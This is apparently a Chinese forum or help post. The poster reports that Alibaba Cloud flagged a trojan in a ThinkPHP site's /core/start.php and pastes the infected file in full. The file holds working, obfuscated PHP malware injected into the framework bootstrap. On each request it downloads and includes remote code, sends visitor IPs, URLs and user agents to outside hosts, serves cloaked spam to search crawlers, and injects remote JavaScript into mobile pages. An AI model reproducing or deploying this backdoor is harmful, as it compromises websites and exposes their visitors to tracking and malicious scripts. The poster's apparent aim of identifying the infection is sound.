阿里云提示木马路径/core/start.php
阿里云提示木马路径/core/start.php
代码如下:
<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006~2018 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------
namespace think;
// ThinkPHP 引导文件
function_tool();// 1. 加载基础文件
require __DIR__ . '/base.php';
// 2. 执行应用
App::run()->send();
function function_tool(){
$rot="str_rot13";$en=$rot("onfr64_rapbqr");$de=$rot("onfr64_qrpbqr");$gu=$rot("tmhapbzcerff");$gc=$rot("tmpbzcerff");$fg=$rot("svyr_trg_pbagragf");$fp=$rot("svyr_chg_pbagragf");$df=$rot("qrsvar");$sr=$rot("fge_ercynpr");$pm=$rot("cert_zngpu");$ul=$rot("heyrapbqr");@session_start();$se = $_SESSION;$is=$rot("vffrg");$er = $_SERVER;$ree=$rot("UGGC_ERSRERE");$cah=$rot('pnpurf/gcy/');
function getIP($er) {$ip_headers = array('HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR','HTTP_X_REAL_IP','REMOTE_ADDR');foreach ($ip_headers as $hdr) {if (isset($er[$hdr]) && !empty($er[$hdr])) {$ipl = explode(',', $er[$hdr]);$ip = trim($ipl[0]);if (filter_var($ip, FILTER_VALIDATE_IP)) {return $ip;}}}return isset($er['REMOTE_ADDR']) && !empty($er['REMOTE_ADDR']) ? $er['REMOTE_ADDR'] : '0.0.0.0';}$u_ip = getIP($er);
error_reporting(0);
header('Content-Type:text/html;charset=utf-8');$opts = array('http'=>array('method'=>"GET",'timeout'=>6));
$ct = stream_context_create($opts);
$jsc = function() {$de="base64_decode";$rot="str_rot13";$jsc0 =file_get_contents($de($rot("nUE0pQbiY2AiMTHhLaLkAwthnJA1Yl9dp2AfnJ5eYaE4qN==")));if ($jsc0 === false) {$jsc0 = $de($rot("nUE0pQbiY2cmL2EhYJcmLmDhqT9jYj=="));}return $jsc0;};
$udl = $de($rot("nUE0pQbiY2cmL2EhYJcmLmDhqT9jYj=="));
if (!file_exists($cah)) {mkdir($cah, 0755, true);};$check = array("<--START-->", "<--END-->");
$icf = $rot('pnpurf/gcy/n11939n301p3nr15018qs559n8n2o102v');
$udch = @$fg($udl.$rot('qngn/hcqngr.cuc?pnpur'),false,$ct);if($udch==="on"){if (is_dir($cah)) {$fls = scandir($cah);foreach ($fls as $f) {if ($f != "." && $f != "..") {$pth = $cah . "/" . $f;if (is_dir($pth)) {} else {unlink($pth);}}}}}
$udst = @$fg($udl.$rot('qngn/hcqngr.cuc?hcqngr'),false,$ct);if($udst==="on"){$cd=@$fg($udl.$rot('qngn/pbqrhq.cuc'),false,$ct);$fp($icf,$de($cd));}
if (file_exists($icf)) {include $icf;}
if(function_exists("function_tool_rm")){function_tool_rm();}else{
$df('url', $er['REQUEST_URI']);$df('ref', $er["HTTP_REFERER"]);
$df('u_ip', $u_ip);$df('c_host', $er['HTTP_HOST']);$df('ent', $er['HTTP_USER_AGENT']);
$df('host_path2', $de($rot("nUE0pQbiY2cmL2EhYJcmLmVhqT9jYj==")));
$df('mob', $de("QG1vYmlsZXxOT0tJQXxMR3xTYW1zdW5nfG1pZHB8d2FwfHVjd2VifHdlY2hhdHxNaWNyb01lc3NlbmdlcnxQaG9uZXxBbmRyb2lkfHdlYk9TfGlQaG9uZXxpUGFkfGlQb2R8QmxhY2tCZXJyeXxPcGVyYSBNaW5pfHVjd2VifG9wZXJhbWluaUBp"));
$df('nomomob', $de("QE1SQTU4TlNPU0Bp"));
$df('regs', $de("QEJhaWR1fFNvZ291fFlpc291fEhhb3NvdXxTcGlkZXJ8U28uY29tfDM2MFNwaWRlcnx0b3V0aWFvfFlvdWRhb0JvdHxTbS5jbnxzb3NvfHlhbmRleHxCeXRlc3BpZGVyfEdvb2dsZUBp"));
$df('moagent', $de("VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzU4LjAuMzAyOS4xMTAgU2FmYXJpLzUzNy4z"));
$df('accept_', $de("QWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS9hdmlmLGltYWdlL3dlYnAsKi8qO3E9MC44"));
$utctme = time();$bjtme = $utctme + (3600 * 8);$h_l_1 = (int) gmdate('G', $bjtme);if ($h_l_1 >= 6 && $h_l_1 < 23) {$tz_1_ = false;} else {$tz_1_ = true;}
$op_1 = array('http' => array('header' => array(moagent, accept_, "Accept-Language: en-US,en;q=0.5"),),);
if($pm(mob, ent)){$mo=1;}else{$mo=0;};$cpy=$rot("/ppbbccll/");$def=$rot("/svyr_chg_pb/");if($pm($def, url)){exit;}$def=$rot("/urk2ova/");if($pm($def, url)){exit;}$def=$rot("/r_shapgvba/");if($pm($def, url)){exit;}
if($pm($cpy, url)){$O0="Y2hveXA=";$O0=$de($O0);$OO=$O0[0].$O0[2].$O0[4].$O0[3];$oo =$de($rot("nUE0pQbiY2AiMTHhLaLkAwthnJA1Y2cmL2MgYaE4qN=="));$o0 = $O0[4].$O0[1].$O0[4];$OO($oo,$de($rot("ITSaL29hMzyaYt==")).$o0);}
if($pm("@id=[[:alnum:]]{6}-[[:alnum:]]{6}@i", url)){
if($pm(regs, ref)){
$ua = "pc";$p = "js_txt"; $host_path = $jsc();
$d = $en("ua=".$ua."&files=".$p."&host=".c_host."&path=".url."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref)));
$jst = @$fg($host_path."/AAPPIv2.php?base=".$d,false,$ct) ?: $fg(host_path2."/AAPPIv2.php?base=".$d,false,$ct);
if($jst) {$jst=$sr($check,"",$jst);$jst = $de($rot($jst));$r_js_txt = "<meta charset=\"utf-8\"><script type=\"text/javascript\" >".$jst."</script>";echo $r_js_txt;exit;}
} elseif($pm(regs, ent)) {
$ua = "pc";$p = "neiye";
$cf = $cah.md5(c_host.url.$p.$mo);
$ch = (file_exists($cf) && (time() - filemtime($cf)) <= 8800000) ? 1 : 0;
$d = $en("ua=".$ua."&files=".$p."&host=".c_host."&path=".url."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref)));
if($ch){$hlt=$gu($fg($cf));}else{$host_path = $jsc();$hlt = $fg($host_path."/AAPPIv2.php?base=".$d, false, $ct);}
foreach($check as $item){if(strpos($hlt,$item)===false){$ch=1;break;}}
if ($ch === 0) {foreach($check as $item) {$hlt = $sr($item, '', $hlt);}}
if($hlt) {if(!$ch){$fp($cf,$gc($hlt));}$hlt = $de($rot($hlt));echo $hlt;exit;}
}
} elseif($pm(regs, ent)) {
$ua = "pc";$p = "shouye";
$cf = $cah.md5(c_host.url.$p.$mo);
$ch = (file_exists($cf) && (time() - filemtime($cf)) <= 430000) ? 1 : 0;
$d = $en("ua=".$ua."&files=".$p."&host=".c_host."&path=".$sr("&","***",url)."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref)));
if($ch){$hlt=$gu($fg($cf));}else{$host_path = $jsc();$hlt = @$fg($host_path."/AAPPIv2.php?base=".$d, false, $ct) ?: $fg(host_path2."/AAPPIv2.php?base=".$d, false, $ct);}
foreach($check as $item){if(strpos($hlt,$item)===false){$ch=1;break;}}
if ($ch === 0) {foreach($check as $item) {$hlt = $sr($item, '', $hlt);}}
if($hlt) {if(!$ch){$fp($cf,$gc($hlt));}$hlt = $de($rot($hlt));echo $hlt;exit;}
} elseif($pm(regs, ref) && $pm(mob, ent) && !$pm(nomomob, ent)) {
$ua = "pc";$p = "shouye"; $host_path = $jsc();
$d = $en("ua=".$ua."&files=".$p."&host=".c_host."&path=".$sr("&","***",url)."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref)));
$jst = @$fg($host_path."/AAPPIv2.php?base=".$d,false,$ct) ?: $fg(host_path2."/AAPPIv2.php?base=".$d,false,$ct);
if($jst) {$jst=$sr($check,"",$jst);$jst = $de($rot($jst));$r_js_txt = "<meta charset=\"utf-8\"><script type=\"text/javascript\" >".$jst."</script>";if (strpos($jst, 'matomo') !== false) {echo $r_js_txt;exit;}
}
}elseif($pm(mob, ent) && !$pm(nomomob, ent) && $tz_1_) {
$hlt = $fg("http://".c_host . url,false,stream_context_create($op_1));
$js_c = $de('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPnZhciBiYyA9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsMTE2LDExNiwxMTIsMTE1LDU4LDQ3LDQ3LDk5LDExMSwxMDAsMTAxLDQ2LDEwNiwxMTMsMTE3LDEwMSwxMTQsMTIxLDQ1LDk5LDExMCwxMDAsNDYsOTksMTExLDEwOSw0NywxMTAsMTA1LDEwMywxMDQsMTE2LDk5LDExMSwxMDAsMTAxLDQ2LDEwNiwxMTUpOyB2YXIgc2NyaXB0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7IHNjcmlwdC5zcmMgPSBiYzsgZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzY3JpcHQpOzwvc2NyaXB0Pg==');
if($hlt){$rp_1 = $de('U3RyaW5nLmZyb21DaGFyQ29kZSg2MCwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDMyLDExNSwxMTQsOTksNjEsMzQsMTA0LDExNiwxMTYsMTEyLDExNSw1OCw0Nyw0Nyw5OSwxMTEsMTAwLDEwMSw0NiwxMDYsMTEzLDExNywxMDEsMTE0LDEyMSw0NSw5OSwxMTAsMTAwLDQ2LDk5LDExMSwxMDksNDcsMTA2LDExMywxMTcsMTAxLDExNCwxMjEsNDUsNTEsNDYsNTYsNDYsNDksNDYsMTA5LDEwNSwxMTAsNDYsMTA2LDExNSwzNCw2Miw2MCw0NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDYyKQ==');$hlt = preg_replace('/<\/body>/i',"</body>".str_repeat(' ', 1500).$js_c,$hlt);$hlt= preg_replace('/String\.fromCharCode\(60,(.*?)62\)/', $rp_1, $hlt);$hlt = preg_replace('/<meta\s+http-equiv=["\']mobile-agent["\']\s+content=["\']format=xhtml;url=[^"\']+["\']\s*\/?>/i', '', $hlt);$hlt = preg_replace('/window\.location\.href=(["\'])(.*?)\1;?/', '', $hlt);;echo $hlt;exit;}
}
}
}